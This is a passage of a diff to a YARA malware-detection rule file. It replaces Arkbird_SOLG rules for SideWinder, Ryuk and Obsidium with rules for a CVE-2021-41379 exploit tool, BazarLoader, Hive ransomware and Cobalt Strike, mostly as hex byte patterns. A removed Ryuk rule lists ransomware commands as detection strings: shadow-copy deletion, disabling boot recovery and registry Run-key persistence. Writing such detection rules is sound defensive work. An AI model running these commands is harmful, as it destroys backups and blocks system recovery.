6a 04 6a 00 6a 01 68 00 00 01 80 8d 85 e8 fd ff ff 50 ff 15 [3] 00 8b 35 [3] 00 a3 [3] 00 8d 85 d8 fb ff ff 50 6a 00 6a 00 68 [2] 40 00 6a 00 6a 00 c7 85 d8 fb ff ff 00 00 00 00 ff d6 8b f8 8b 85 dc fb ff ff 68 [3] 00 05 0c 02 00 00 68 04 01 00 00 50 } + $s3 = { 55 8b ec 81 ec 04 08 00 00 a1 04 [2] 00 33 c5 89 45 fc 0f 10 05 [3] 00 ?? 8b ?? 08 8d 85 2c f8 ff ff [0-1] 0f 11 85 fc f7 ff ff [1-5] 0f 10 05 [3] 00 [3-8] 0f 11 85 0c f8 ff ff [0-1] 0f 10 05 } + $s4 = { 50 ff ?? 68 04 01 00 00 8d 85 e0 fb ff ff 50 6a 00 ff 15 [3] 00 50 ff 15 [3] 00 6a 00 e8 [2] ff ff 50 8d 85 e0 fb ff ff 50 ff 15 84 [2] 00 6a 00 ff 15 [3] 00 8d 85 ?? fb ff ff 50 68 [3] 00 6a 04 6a 00 68 [3] 00 ff 15 [3] 00 ff 15 [3] 00 8b 35 [3] 00 8b 3d [3] 00 } condition: - uint16(0)==0x5a4d and filesize <90KB and 15 of them + uint16(0)==0x5A4D and filesize >25KB and all of ($s*) } -import "pe" - -rule ARKBIRD_SOLG_APT_Sidewinder_NET_Loader_Aug_2020_1 : FILE +rule ARKBIRD_SOLG_EXP_CVE_2021_41379_Nov_2021_3 : CVE_2021_41379 FILE { meta: - description = "Detected the NET loader used by SideWinder group (August 2020)" + description = "Detect exploit tool using CVE-2021-41379 (variant 3)" author = "Arkbird_SOLG" - id = "7334a3b8-cd56-5820-a073-5bd22076644f" - date = "2020-08-24" - modified = "2020-08-24" - reference = "https://twitter.com/ShadowChasing1/status/1297902086747598852" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-08-24/SideWinder/APT_SideWinder_NET_Loader_Aug_2020_1.yar#L3-L21" + id = "c82578d6-63ca-50f6-b105-321791ec8808" + date = "2021-11-26" + modified = "2021-11-29" + reference = "Internal Research" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-11-26/EXP_CVE_2021_41379_Nov_2021_3.yara#L1-L27" license_url = "N/A" - logic_hash = "b40127cd845d75ef81eb230c12635da00dd77fc53e5886c253a2466627aa8534" + logic_hash = "559c4ca0e9ac60e3dd7d5b9a8eb22d887b0b436d4e1fc528e05e7a33ecce0aa6" score = 75 - quality = 73 - tags = "FILE" - hash1 = "4a0947dd9148b3d5922651a6221afc510afcb0dfa69d08ee69429c4c75d4c8b4" + quality = 75 + tags = "CVE-2021-41379, FILE" + hash1 = "0dcda614c0128813bf74802f0e98ffd5ec32a40f35ed42778a5ec5984b5adf47" + hash2 = "3c78e07924e1503be1f8785c23d0dd813f04211992cbd6a4955cd0e25c745735" + hash3 = "57ec6e15bcc9c79c118f97103815bd74226d4baae334142890a52fbbc5006f1b" + hash4 = "9d24383e50e61257c565e47ec073cbb2cd751b6f650f0d542b0643dbe6691b3c" + tlp = "white" + adversary = "-" strings: - $s1 = "DUSER.dll" fullword wide - $s2 = "UHJvZ3JhbQ==" fullword wide - $s3 = ".tmp " fullword wide - $s4 = "U3RhcnQ=" fullword wide - $s5 = "Gadgets" fullword ascii - $s6 = "AdapterInterfaceTemplateObject" fullword ascii - $s7 = "FileRipper" fullword ascii - $s8 = "copytight @" fullword wide + $s1 = { 8d 0d [2] 03 00 e8 [2] ff ff 41 b8 00 00 00 80 33 d2 33 c9 ff 15 [2] 03 00 48 89 45 08 41 b8 01 00 00 00 48 8d 15 [3] 00 48 8b 4d 08 ff 15 [2] 03 00 48 89 45 28 ff 15 [2] 03 00 3d 24 } + $s2 = { 33 d2 48 8b 4d 08 ff 15 [2] 03 00 c7 45 24 00 00 00 00 48 8d 55 24 48 8b 4d 08 ff 15 [2] 03 00 48 8b 4d 08 ff 15 [2] 03 00 ff 15 [2] 03 00 44 8b c0 33 d2 b9 00 10 10 00 ff 15 [2] 03 00 48 89 45 48 48 c7 45 68 00 00 00 00 4c 8d 45 68 ba ff 01 0f 00 48 8b 4d 48 ff 15 [2] 03 00 48 8b 4d 48 ff 15 [2] 03 00 48 c7 85 88 00 00 00 00 00 00 00 48 8d 85 88 00 00 00 48 89 44 24 28 c7 44 24 20 01 00 00 00 41 b9 02 00 00 00 45 33 c0 ba ff 01 0f 00 48 8b 4d 68 ff 15 [2] 03 00 48 8b 4d 68 ff 15 [2] 03 00 41 b9 04 00 00 00 4c 8d 45 24 ba 0c 00 00 00 48 8b 8d 88 00 00 00 ff 15 [2] 03 00 48 8d 85 a8 00 00 00 48 8b f8 33 c0 b9 18 00 00 00 f3 aa 48 8d 85 e0 00 00 00 48 8b f8 33 c0 b9 68 00 00 00 f3 aa c7 85 e0 00 00 00 68 00 00 00 b8 05 00 00 00 66 89 85 20 01 00 00 48 8d 05 [2] 02 00 48 89 85 f0 00 00 00 41 b8 04 01 00 00 48 8d 95 70 01 00 00 48 8d 0d [2] 02 00 ff 15 [2] 03 00 48 8d 85 a8 00 00 00 48 89 44 24 50 48 8d 85 e0 00 00 00 48 89 44 24 48 48 c7 44 24 40 00 00 00 00 48 c7 44 24 38 00 00 00 00 c7 44 24 30 10 00 00 00 c7 44 24 28 00 00 00 00 48 c7 44 24 20 00 00 00 00 45 33 c9 45 33 c0 48 8d 95 70 01 00 00 48 8b 8d 88 00 00 00 ff 15 [2] 03 00 48 8b 8d 88 00 00 00 ff 15 [2] 03 00 48 8b 8d a8 00 00 00 ff 15 [2] 03 00 48 8b 8d b0 00 00 00 ff 15 [2] 03 00 } + $s3 = { 41 b8 00 00 00 80 33 d2 33 c9 ff 15 [2] 03 00 48 89 45 08 41 b8 01 00 00 00 48 8d 15 [3] 00 48 8b 4d 08 ff 15 [2] 03 00 48 89 45 28 48 8b 4d 08 ff 15 [2] 03 00 48 c7 45 48 00 00 00 00 c7 45 64 00 00 00 00 4c 8d 4d 64 45 33 c0 48 8b 55 48 48 8b 4d 28 ff 15 [2] 03 00 8b 45 64 48 89 85 88 04 00 00 ff 15 [2] 03 00 48 8b 8d 88 04 00 00 4c 8b c1 ba 0c 00 00 00 48 8b c8 ff 15 [2] 03 00 48 89 45 48 4c 8d 4d 64 44 8b 45 64 48 8b 55 48 48 8b 4d 28 ff 15 [2] 03 00 48 8b 45 48 4c 8b 40 10 ba 04 01 00 00 48 8d 8d 90 00 00 00 ff 15 [2] 03 00 ff 15 [2] 03 00 4c 8b 45 48 33 d2 48 8b c8 ff 15 [2] 03 00 48 8b 4d 28 ff 15 [2] 03 00 c7 85 b4 02 00 00 01 00 00 00 c7 85 d4 02 00 00 00 00 00 } + $s4 = { 68 00 00 00 80 6a 00 6a 00 ff 15 24 f0 43 00 3b f4 e8 bf 5b ff ff 89 45 f8 8b f4 6a 01 68 34 84 43 00 8b 45 f8 50 ff 15 20 f0 43 00 3b f4 e8 a2 5b ff ff 89 45 ec 8b f4 ff 15 2c f1 43 00 3b f4 e8 90 5b ff ff 3d 24 } + $s5 = { f3 ab a1 0c d0 43 00 33 c5 89 45 fc b9 d9 10 44 00 e8 55 9c ff ff 8b 45 08 89 45 f4 b9 0c 00 00 00 be a4 7e 43 00 8d bd ec f7 ff ff f3 a5 68 d0 07 00 00 6a 00 8d 85 1c f8 ff ff 50 e8 bd 95 ff } + $s6 = { 8b f4 6a 00 8b 45 f4 50 ff 15 88 f0 43 00 3b f4 e8 8d 67 ff ff c7 45 e8 00 00 00 00 8b f4 8d 45 e8 50 8b 4d f4 51 ff 15 c8 f0 43 00 3b f4 e8 6f 67 ff ff 8b f4 8b 45 f4 50 ff 15 30 f1 43 00 3b f4 e8 5c 67 ff ff 8b f4 ff 15 a4 f0 43 00 3b f4 e8 4d 67 ff ff 8b f4 50 6a 00 68 00 10 10 00 ff 15 b8 f0 43 00 3b f4 e8 36 67 ff ff 89 45 dc c7 45 d0 00 00 00 00 8b f4 8d 45 d0 50 68 ff 01 0f 00 8b 4d dc 51 ff 15 3c f0 43 00 3b f4 e8 10 67 ff ff 8b f4 8b 45 dc 50 ff 15 30 f1 43 00 3b f4 e8 fd 66 ff ff c7 45 c4 00 00 00 00 8b f4 8d 45 c4 50 6a 01 6a 02 6a 00 68 ff 01 0f 00 8b 4d d0 51 ff 15 38 f0 43 00 3b f4 e8 d4 66 ff ff 8b f4 8b 45 d0 50 ff 15 30 f1 43 00 3b f4 e8 c1 66 ff ff 8b f4 6a 04 8d 45 e8 50 6a 0c 8b 4d c4 51 ff 15 2c f0 43 00 3b f4 e8 a6 66 ff ff 33 c0 89 45 ac 89 45 b0 89 45 b4 89 45 b8 6a 44 6a 00 8d 85 60 ff ff ff 50 e8 36 63 ff ff 83 c4 0c c7 85 60 ff ff ff 44 00 00 00 b8 05 00 00 00 66 89 45 90 c7 85 68 ff ff ff a0 86 43 00 8b f4 68 04 01 00 00 8d 85 50 fd ff ff 50 68 c8 86 43 00 ff 15 58 f1 43 00 3b f4 e8 48 66 ff ff 8b f4 8d 45 ac 50 8d 8d } + $s7 = { 40 53 48 81 ec 30 08 00 00 48 8b 05 b8 78 00 00 48 33 c4 48 89 84 24 20 08 00 00 0f 10 05 7e 4e 00 00 48 8b d9 33 d2 0f 10 0d 82 4e 00 00 48 8d 4c 24 50 41 b8 d0 07 00 00 0f 29 44 24 20 0f 10 05 7b 4e 00 00 0f 29 4c 24 30 0f 29 44 24 40 e8 da 42 00 00 4c 8b 03 48 8d 4c 24 20 ba 00 04 00 00 e8 6a f8 ff ff 33 d2 8d 4a 02 ff 15 77 4c 00 00 48 8b 4b 08 48 8d 54 24 20 ff 15 70 4c 00 00 33 c0 48 8b 8c 24 20 08 00 00 48 33 cc e8 de 34 00 00 48 81 c4 30 08 00 00 } + $s8 = { 33 d2 48 8b cb ff 15 c6 2c 00 00 83 65 00 00 48 8d 55 00 48 8b cb ff 15 85 2c 00 00 48 8b cb ff 15 1c 2d 00 00 ff 15 86 2c 00 00 33 d2 b9 00 10 10 00 44 8b c0 ff 15 46 2c 00 00 48 83 64 24 68 00 4c 8d 44 24 68 48 8b c8 ba ff 01 0f 00 48 8b d8 ff 15 82 2b 00 00 48 8b cb ff 15 e1 2c 00 00 48 8b 4c 24 68 48 8d 44 24 60 48 83 64 24 60 00 41 b9 02 00 00 00 48 89 44 24 28 45 33 c0 ba ff 01 0f 00 c7 44 24 20 01 00 00 00 ff 15 80 2b 00 00 48 8b 4c 24 68 ff 15 a5 2c 00 00 48 8b 4c 24 60 4c 8d 45 00 41 b9 04 00 00 00 41 8d 51 08 ff 15 1c 2b 00 00 33 c0 48 8d 4d 90 0f 57 c0 48 89 45 80 33 d2 0f 11 44 24 70 8d 58 68 44 8b c3 e8 5b 25 00 00 8d 43 9d 89 5d 90 66 89 45 d0 48 8d 55 10 48 8d 05 e0 33 00 00 41 b8 04 01 00 00 48 8d 0d f3 33 00 00 48 89 45 a0 ff 15 91 2c 00 00 48 8b 4c 24 60 48 8d 44 24 70 48 89 44 24 50 48 8d 55 10 48 8d 45 90 45 33 c9 48 89 44 24 48 45 33 c0 48 83 64 24 40 00 48 83 64 24 38 00 c7 44 24 30 10 00 00 00 83 64 24 28 00 48 83 64 24 20 00 ff 15 9a 2a 00 00 48 8b 4c 24 60 ff 15 ef 2b 00 00 48 8b 4c 24 70 ff 15 e4 2b 00 00 48 8b 4c 24 78 ff 15 d9 } + $s9 = { 33 d2 33 c9 41 b8 00 00 00 80 ff 15 ba 33 00 00 41 b8 01 00 00 00 48 8d 15 7d 3b 00 00 48 8b c8 48 8b d8 ff 15 d9 33 00 00 48 8b cb 48 8b f8 ff 15 8d 33 00 00 4c 8d 4c 24 20 89 74 24 20 45 33 c0 33 d2 48 8b cf ff 15 ae 33 00 00 8b 5c 24 20 ff 15 64 34 00 00 44 8b c3 ba 0c 00 00 00 48 8b c8 ff 15 33 34 00 00 44 8b 44 24 20 4c 8d 4c 24 20 48 8b d0 48 8b cf 48 8b d8 ff 15 7a 33 00 00 4c 8b 43 10 48 8d 4c 24 30 ba 04 01 00 00 ff 15 46 37 00 00 ff 15 20 34 00 00 4c 8b c3 33 d2 48 8b c8 ff 15 9a 33 00 00 48 8b cf ff 15 11 33 00 00 48 8d 4c 24 30 8b fe ff 15 a4 33 00 00 83 e8 02 } condition: - uint16(0)==0x5a4d and filesize <4KB and ((pe.exports("FileRipper") and pe.exports("Gadgets")) and 5 of them ) + uint16(0)==0x5A4D and filesize >25KB and 3 of ($s*) } -rule ARKBIRD_SOLG_Ran_Ruyk_Oct_2020_2 : FILE +rule ARKBIRD_SOLG_MAL_Bazarloader_Oct_2021_1 : FILE { meta: - description = "Detect RYUK ransomware (Sept_2020_V1 + V2)" + description = "Detect BazarLoader implant" author = "Arkbird_SOLG" - id = "82ed6736-00e6-5a30-89cf-a2b86f2e1ba6" - date = "2020-10-25" - modified = "2020-10-28" - reference = "Internal Research" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-10-27/RYUK/Ran_Ruyk_Oct2020_2.yar#L1-L29" + id = "d6462e74-fe1d-599e-aac8-0d0942ca42ad" + date = "2021-10-30" + modified = "2021-10-30" + reference = "https://twitter.com/malwrhunterteam/status/1454154412902002692" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-10-29/Hive/MAL_BazarLoader_Oct_2021_1.yara#L1-L17" license_url = "N/A" - logic_hash = "a06d61b9363b732d17a2766b280951198a6adc226e284ab1d909cd98516cfb6f" + logic_hash = "afbe02ef9e69ac5105aaae28240d6863c9c4578c0e8fd7c86c38d975cf8acdc6" score = 75 - quality = 46 + quality = 75 tags = "FILE" - hash1 = "d0d7a8f588693b7cc967fb4069419125625eb7454ba553c0416f35fc95307cbe" - hash2 = "d7333223dcc1002aae04e25e31d8c297efa791a2c1e609d67ac6d9af338efbe8" - hash3 = "bbbf38de4f40754f235441a8e6a4c8bdb9365dab7f5cfcdac77dbb4d6236360b" - hash4 = "cfe1678a7f2b949966d9a020faafb46662584f8a6ac4b72583a21fa858f2a2e8" - hash5 = "e8a0e80dfc520bf7e76c33a90ed6d286e8729e9defe6bb7da2f38bc2db33f399" - hash6 = "5b1f242aee0eabd4dffea0fe5f08aba60abf7c8d1e4f7fc7357af7f20ccd0204" + hash1 = "0ba7554e7d120ce355c6995c6af95542499e4ec2f6012ed16b32a85175761a94" + hash2 = "2b29c80a4829d3dc816b99606aa5aeead3533d24137f79b5c9a8407957e97b10" + tlp = "white" + adversary = "-" strings: - $s1 = "Type Descriptor'" fullword ascii - $s2 = "Class Hierarchy Descriptor'" fullword ascii - $s3 = "GET:PV" fullword ascii - $s4 = "Base Class Descriptor at (" fullword ascii - $s5 = "Complete Object Locator'" fullword ascii - $s6 = "UINi\\cYIqwxAcV^GYCY^EgzUvSZcsRW" fullword ascii - $s7 = "FrystFsgcteIaui" fullword ascii - $s8 = "delete[]" fullword ascii - $s9 = "Picuovphv Bbsg!Es|rwojrarkkd Stryjfes x4.3" fullword ascii - $s10 = "FrystGfuvrozHctj" fullword ascii - $s11 = "FrystUfngasfCqovf{v" fullword ascii - $op1 = { 63 62 6d 75 6a 7a 6e 49 4d 54 50 78 75 70 78 59 6f 65 71 4f 57 48 4a 78 57 71 4c 50 55 78 4a 6e 68 4b 71 57 57 6d 49 75 6a 51 64 4f 50 74 70 63 76 61 42 72 75 5a 6a 4d 69 79 59 52 69 58 78 4a 63 6b 51 70 4b 75 47 52 5a 51 42 5a 5a 61 50 69 76 66 77 43 6c 45 5a 67 76 6e 49 6c 54 74 4b 46 4d 68 53 4a 42 4f 64 6a 69 46 44 4d 62 70 78 76 52 5a 69 61 74 69 71 5a 6e 75 67 5a 62 78 72 51 } - $op2 = { 23 71 59 72 51 6d 58 48 4a 77 65 55 53 76 68 79 4f 62 51 50 6d 44 44 52 44 6e 72 49 53 57 6c 72 56 4a 56 75 68 52 4e 4a 66 6b 50 6e 6b 72 65 68 73 6e 6b 68 54 4e 70 6a 56 7a 7a 64 61 44 6e 62 44 67 5a 54 62 4b 65 63 54 69 35 4f 71 20 64 24 2d } + $s1 = { 48 8b 44 24 60 c6 80 38 01 00 00 01 48 8b 44 24 60 c6 80 39 01 00 00 02 48 8b 44 24 60 c7 40 5c 03 00 00 00 b8 60 00 00 00 48 6b c0 00 48 8b 4c 24 60 48 03 41 68 48 89 44 24 20 48 8b 44 24 20 c7 00 01 00 00 00 48 8b 44 24 20 c7 40 08 02 00 00 00 48 8b 44 24 20 c7 40 0c 02 00 00 00 48 8b 44 24 20 c7 40 10 00 00 00 00 48 8b 44 24 20 c7 40 14 00 00 00 00 48 8b 44 24 20 c7 40 18 00 00 00 00 b8 60 00 00 00 48 6b c0 01 48 8b 4c 24 60 48 03 41 68 48 89 44 24 20 48 8b 44 24 20 c7 00 22 00 00 00 48 8b 44 24 20 c7 40 08 01 00 00 00 48 8b 44 24 20 c7 40 0c 01 00 00 00 48 8b 44 24 20 c7 40 10 01 00 00 00 48 8b 44 24 20 c7 40 14 01 00 00 00 48 8b 44 24 20 c7 40 18 01 00 00 00 b8 60 00 00 00 48 6b c0 02 48 8b 4c 24 60 48 03 41 68 48 89 44 24 20 48 8b 44 24 20 c7 00 23 00 00 00 48 8b 44 24 20 c7 40 08 01 00 00 00 48 8b 44 24 20 c7 40 0c 01 00 00 00 48 8b 44 24 20 c7 40 10 01 00 00 00 48 8b 44 24 20 c7 40 14 01 00 00 00 48 8b 44 24 20 c7 40 18 01 } + $s2 = { 48 8b 44 24 50 48 8b 00 c7 40 28 10 00 00 00 48 8b 44 24 50 48 8b 00 b9 04 00 00 00 48 6b c9 00 48 8b 54 24 50 8b 92 18 01 00 00 89 54 08 2c 48 8b 44 24 50 48 8b 00 48 8b 4c 24 50 ff 10 48 8b 4c 24 50 e8 80 f8 ff ff 48 8b 4c 24 50 e8 c6 fe ff ff 48 8b 44 24 50 83 78 78 00 76 16 48 8b 44 24 50 83 78 74 00 76 0b 48 8b 44 24 50 83 78 7c 00 7f 1e 48 8b 44 24 50 48 8b 00 c7 40 28 21 00 00 00 48 8b 44 24 50 48 8b 00 48 8b 4c 24 50 ff 10 48 8b 44 24 50 48 8b 4c 24 50 8b 40 74 0f af 41 7c 89 44 24 24 8b 44 24 24 89 44 24 34 8b 44 24 24 39 44 24 34 74 1e 48 8b 44 24 50 48 8b 00 c7 40 28 48 00 00 00 48 8b 44 24 50 48 8b 00 48 8b 4c 24 50 ff 10 48 8b 44 24 38 c7 40 18 00 00 00 00 48 8b 4c 24 50 e8 0c fc ff ff 48 8b 4c 24 38 88 41 1c 48 8b 44 24 38 48 c7 40 20 00 00 00 00 48 8b 44 24 38 48 c7 40 28 00 00 00 00 48 8b 44 24 50 0f b6 40 62 85 c0 74 0d 48 8b 44 } + $s3 = { 48 8b 84 24 c0 00 00 00 8b 80 64 01 00 00 39 44 24 30 0f 8d 82 00 00 00 48 63 44 24 30 48 8b 8c 24 c0 00 00 00 48 8b 84 c1 68 01 00 00 48 89 44 24 58 48 8b 44 24 38 48 8b 4c 24 58 8b 40 10 0f af 41 0c 48 8b 4c 24 58 48 63 49 04 48 8b 94 24 c0 00 00 00 48 8b 52 08 48 89 54 24 70 c6 44 24 20 00 4c 8b 44 24 58 45 8b 48 0c 44 8b c0 48 8b 44 24 38 48 8b 54 c8 70 48 8b 8c 24 c0 00 00 00 48 8b 44 24 70 ff 50 40 48 63 4c 24 30 48 89 84 cc 80 00 00 00 e9 5c ff ff ff 48 8b 44 24 38 8b 40 18 89 44 24 40 eb 0a 8b 44 24 40 ff c0 89 44 24 40 48 8b 44 24 38 8b 40 1c 39 44 24 40 0f 8d af 01 00 00 48 8b 44 24 38 8b 40 14 89 44 24 44 eb 0a 8b 44 24 44 ff c0 89 44 24 44 48 8b 84 24 c0 00 00 00 8b 80 88 01 00 00 39 44 24 44 0f 83 6e 01 00 00 c7 44 24 50 00 00 00 00 c7 44 24 30 00 00 00 00 eb 0a 8b 44 24 30 ff c0 89 44 24 30 48 8b 84 24 c0 00 00 00 8b 80 64 01 00 00 39 44 24 30 0f 8d e2 00 00 00 48 63 44 24 30 48 8b 8c 24 c0 00 00 00 48 8b 84 c1 68 01 00 00 48 89 44 24 58 48 8b 44 24 58 8b 4c 24 44 0f af 48 38 8b c1 89 44 24 60 c7 44 24 48 00 00 00 00 eb 0a 8b 44 24 48 ff c0 89 44 24 48 48 8b } condition: - uint16(0)==0x5a4d and filesize >40KB and 6 of ($s*) and 1 of ($op*) + uint16(0)==0x5A4D and filesize >200KB and all of ($s*) } -rule ARKBIRD_SOLG_Mem_Cryptor_Obsidium_Oct_2020_1 : FILE +rule ARKBIRD_SOLG_RAN_ELF_Hive_Oct_2021_1 : FILE { meta: - description = "Detect Obsidium cryptor by memory string" + description = "Detect ELF version of Hive ransomware" author = "Arkbird_SOLG" - id = "039c45f0-cc43-50ee-ae4e-a7e0e220dc04" - date = "2020-10-25" - modified = "2020-10-27" - reference = "Internal Research" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-10-27/RYUK/Mem_Cryptor_Obsidium_Oct_2020_1.yar#L1-L15" + id = "434cfe85-3209-5990-9c68-47ce4fafd5b8" + date = "2021-10-29" + modified = "2021-10-30" + reference = "https://twitter.com/ESETresearch/status/1454100591261667329" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-10-29/Hive/RAN_ELF_Hive_Oct_2021_1.yara#L1-L19" license_url = "N/A" - logic_hash = "5f471064505d7ab634b6d52f66fa0a96682af2eb1dd41afe4449543253c6bbf7" - score = 75 - quality = 50 + logic_hash = "47ccf3b825521986070dba92194d5937289c0335b922537ea3242c4afb2be237" + score = 60 + quality = 35 tags = "FILE" + hash1 = "6a0449a0b92dc1b17da219492487de824e86a25284f21e6e3af056fe3f4c4ec0" + hash2 = "bdf3d5f4f1b7c90dfc526340e917da9e188f04238e772049b2a97b4f88f711e3" + tlp = "white" + adversary = "-" + level = "experimental" strings: - $s1 = "Obsidium\\" fullword ascii - $s2 = "obsidium.dll" fullword ascii - $s3 = "Software\\Obsidium" fullword ascii - $s4 = "winmm.dll" fullword ascii - $s5 = "'license.key" fullword ascii + $s1 = { 49 3b 66 10 76 ?? 48 83 ec ?? 48 89 6c 24 ?? 48 8d 6c 24 ?? 48 8b [3] 48 } + $s2 = { 48 89 f8 48 89 f3 48 83 ec 27 48 83 e4 f0 48 89 44 24 10 48 89 5c 24 18 48 8d 3d 41 [2] 00 48 8d 9c 24 68 00 ff ff 48 89 5f 10 48 89 5f 18 48 89 1f 48 89 67 08 b8 00 00 00 00 0f a2 89 c6 83 f8 00 74 33 81 fb 47 65 6e 75 75 1e 81 fa 69 6e 65 49 75 16 81 f9 6e 74 65 6c 75 0e c6 05 [3] 00 01 c6 05 [3] 00 01 b8 01 00 00 00 0f a2 89 05 [3] 00 48 8b 05 } + $s3 = { 66 0f 38 dc ?? 66 0f 38 dc ?? 66 0f 38 dc ?? 66 0f 38 dc ?? 66 0f 38 dc ?? 66 0f 38 dc } + $s4 = { 00 00 48 8b ac 24 68 02 00 00 48 81 c4 70 02 00 00 c3 ?? 80 ?? 0e [6] 48 8b [2] 48 } condition: - uint16(0)==0x5a4d and filesize >40KB and 3 of ($s*) + uint32(0)==0x464C457F and filesize >20KB and all of ($s*) } -rule ARKBIRD_SOLG_Ran_Ruyk_Oct_2020_1 : FILE +rule ARKBIRD_SOLG_MAL_Cobaltstrike_Oct_2021_1 : FILE { meta: - description = "Detect RYUK ransomware (Sept_2020_V1)" + description = "Detect Cobalt Strike implant" author = "Arkbird_SOLG" - id = "7ade43ef-cd31-5308-b5ab-71f04d27018b" - date = "2020-10-25" - modified = "2020-10-27" - reference = "Internal Research" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-10-27/RYUK/Ran_Ruyk_Oct2020_1.yar#L1-L29" + id = "89d46993-cc1b-536b-b1ab-a0e967d0d397" + date = "2021-10-30" + modified = "2021-10-30" + reference = "https://twitter.com/malwrhunterteam/status/1454154412902002692" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-10-29/Hive/MAL_CobaltStrike_Oct_2021_1.yara#L1-L19" license_url = "N/A" - logic_hash = "b70eb2e5f58076ea8d4d1370649358acf68f3119cb2be6d5ef0a302bb3bf5d1e" + logic_hash = "4f1a2306b8279be67829d0d515063caae6a9d7a07078a43c2cbe62f675bcb450" score = 75 quality = 75 tags = "FILE" - hash1 = "bbbf38de4f40754f235441a8e6a4c8bdb9365dab7f5cfcdac77dbb4d6236360b" - hash2 = "cfe1678a7f2b949966d9a020faafb46662584f8a6ac4b72583a21fa858f2a2e8" - hash3 = "e8a0e80dfc520bf7e76c33a90ed6d286e8729e9defe6bb7da2f38bc2db33f399" + hash1 = "f520f97e3aa065efc4b7633735530a7ea341f3b332122921cb9257bf55147fb7" + hash2 = "7370c09d07b4695aa11e299a9c17007e9267e1578ce2753259c02a8cf27b18b6" + hash3 = "bfbc1c27a73c33e375eeea164dc876c23bca1fbc0051bb48d3ed3e50df6fa0e8" + tlp = "white" + adversary = "-" strings: - $c1 = "\" /TR \"C:\\Windows\\System32\\cmd.exe /c for /l %x in (1,1,50) do start wordpad.exe /p " fullword ascii - $c2 = "cmd.exe /c \"bootstatuspolicy ignoreallfailures\"" fullword ascii - $c3 = "C:\\Windows\\System32\\cmd.exe" fullword ascii - $c4 = "cmd.exe /c \"WMIC.exe shadowcopy delete\"" fullword ascii - $c5 = "cmd.exe /c \"vssadmin.exe Delete Shadows /all /quiet\"" fullword ascii - $c6 = "cmd.exe /c \"bcdedit /set {default} recoveryenabled No & bcdedit /set {default}\"" fullword ascii - $r1 = "/C REG ADD \"HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\" /v \"EV\" /t REG_SZ /d \"" fullword wide - $r2 = "/C REG DELETE \"HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\" /v \"EV\" /f" fullword wide - $ref1 = "lsaas.exe" fullword wide - $ref2 = "Ncsrss.exe" fullword wide - $ref3 = "$WGetCurrentProcess" fullword ascii - $ref4 = "lan.exe" fullword wide - $ref5 = "explorer.exe" fullword wide - $ref6 = "Ws2_32.dll" fullword ascii - $p1 = "\\users\\Public\\sys" fullword wide - $p2 = "\\Documents and Settings\\Default User\\sys" fullword wide + $s1 = { 48 83 ec 10 4c 89 14 24 4c 89 5c 24 08 4d 33 db 4c 8d 54 24 18 4c 2b d0 4d 0f 42 d3 65 4c 8b 1c 25 10 00 00 00 4d 3b d3 f2 73 17 66 41 81 e2 00 f0 4d 8d 9b 00 f0 ff ff 41 c6 03 00 4d 3b d3 f2 75 ef 4c 8b 14 24 4c 8b 5c 24 08 48 83 c4 10 f2 c3 } + $s2 = { 89 ?? 24 ?? 8b ?? 24 0c 89 ?? 24 ?? 8b ?? 24 ?? c1 ?? 0d 89 ?? 24 0c 48 8b ?? 24 10 89 ?? 24 [2] 8b ?? 24 10 } + $s3 = { b8 10 00 00 00 48 89 45 ?? e8 [3] 00 48 29 c4 48 89 e0 48 8b 4d ?? 48 89 45 ?? 48 89 c8 e8 [3] 00 48 29 c4 48 89 e0 48 8b 4d ?? 48 89 45 ?? 48 89 c8 e8 [3] 00 48 29 c4 48 89 e0 48 8b 4d ?? 48 89 45 ?? 48 89 c8 e8 [3] 00 48 29 c4 48 89 e0 48 8b 4d ?? 48 89 45 ?? 48 89 c8 e8 [3] 00 48 29 c4 48 89 e0 48 8b 4d ?? 8b 55 f8 89 11 4c 8b 45 ?? 4c 8b 4d f0 4d 89 08 4c 8b 55 ?? 4c 8b 5d e8 4d 89 1a 48 8b 75 ?? 48 8b 7d e0 48 89 3e c7 00 ?? 00 00 00 48 8b 05 [3] 00 48 05 [2] 00 00 8b 19 4d 8b 00 4d 8b 32 48 8b 0e 48 83 ec 20 4c 89 f2 41 89 d9 ff d0 48 83 c4 20 ?? 45 } + $s4 = { 48 83 ec 48 44 89 4c 24 44 4c 89 44 24 38 48 89 54 24 30 48 89 4c 24 28 c7 44 24 24 ?? 00 00 00 48 8b 05 [3] 00 48 05 [2] 00 00 44 8b 4c 24 44 4c 8b 44 24 38 48 8b 54 24 30 48 8b 4c 24 28 ff d0 90 48 83 c4 } condition: - uint16(0)==0x5a4d and filesize >40KB and 4 of ($c*) and 1 of ($r*) and 4 of ($ref*) and 1 of ($p*) + uint16(0)==0x5A4D and filesize >20KB and 3 of ($s*) } -rule ARKBIRD_SOLG_RAN_Biglock_Jun_2021_1 : FILE +rule ARKBIRD_SOLG_APT_Unknown_Middle_East_Feb_2020_1 : FILE { meta: - description = "Detect BigLock ransomware" + description = "Dectect unknown Middle East implants (retrohunt June 2020)" author = "Arkbird_SOLG" - id = "6a3fbb70-034d-5932-8c7f-de8d1b3df25c" - date = "2021-06-05" - modified = "2021-06-05" - reference = "https://twitter.com/fbgwls245/status/1400971422336311297" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-06-05/BigLock/RAN_BigLock_Jun_2021_1.yara#L1-L18" + id = "e45675e6-29d5-587b-943e-19450772a092" + date = "2021-03-05" + modified = "2021-03-06" + reference = "internal Research" + source_url = 